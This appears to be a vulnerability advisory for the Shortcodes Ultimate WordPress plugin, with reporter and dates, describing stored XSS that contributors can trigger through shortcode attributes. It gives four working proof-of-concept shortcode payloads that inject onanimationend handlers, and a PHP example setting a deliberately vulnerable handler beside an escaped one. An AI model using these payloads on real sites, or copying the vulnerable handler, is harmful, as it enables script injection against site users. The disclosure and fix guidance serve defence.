The plugin allows users with the Contributor role to perform stored XSS via shortcode attributes. Note: the plugin is inconsistent in its handling of shortcode attributes; some are escaped, most are not, and some attributes are insecure by design (such as the onclick attribute of [su_button]).
[su_accordion class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)']
[su_animate duration='1s;animation-name:twentytwentyone-close-button-transition;' type='" onanimationend="alert(2)']
[su_audio width='1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(3)//' url="a"]
[su_box color='red;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(4)//']
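The root cause described above is attribute values interpolated into HTML markup without escaping. As an added illustration (not code from the Shortcodes Ultimate plugin or from the reporter), here is a hypothetical [demo_box] shortcode handler in the vulnerable form beside a hardened form; it assumes a WordPress environment for shortcode_atts(), esc_attr() and add_shortcode().

```php
<?php
// Added example: hypothetical [demo_box] shortcode, not the plugin's own code.
// Assumes WordPress is loaded (shortcode_atts, esc_attr, add_shortcode).

// Vulnerable pattern: attribute values go straight into the markup. A value
// containing a double quote closes the class attribute, so a contributor can
// append further attributes such as style or an event handler to the element.
function demo_box_vulnerable( $atts ) {
    $atts = shortcode_atts( array( 'class' => '', 'color' => 'red' ), $atts, 'demo_box' );
    return '<div class="demo-box ' . $atts['class'] . '" style="color:' . $atts['color'] . '">box</div>';
}

// Hardened pattern: every value passes through esc_attr(), which encodes
// quotes and angle brackets so the value cannot leave its attribute. The
// value that lands in a style attribute is additionally restricted to a plain
// CSS colour token, because escaping alone does not stop CSS-level injection
// (extra declarations such as animation-name) inside an existing attribute.
function demo_box_hardened( $atts ) {
    $atts  = shortcode_atts( array( 'class' => '', 'color' => 'red' ), $atts, 'demo_box' );
    $class = esc_attr( $atts['class'] );
    // Accept only a hex colour or a bare colour keyword; otherwise fall back.
    $color = preg_match( '/^(#[0-9a-fA-F]{3,8}|[a-zA-Z]+)$/', $atts['color'] ) ? $atts['color'] : 'red';
    return '<div class="demo-box ' . $class . '" style="color:' . esc_attr( $color ) . '">box</div>';
}

// Only the hardened handler should ever be registered.
add_shortcode( 'demo_box', 'demo_box_hardened' );
```

Attributes whose whole purpose is to carry script (like the onclick attribute mentioned above) cannot be fixed by escaping; they should be removed or limited to users with the unfiltered_html capability.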
apple502j
Yes
2021-08-23 (about 1 year ago)
2022-03-07 (about 1 year ago)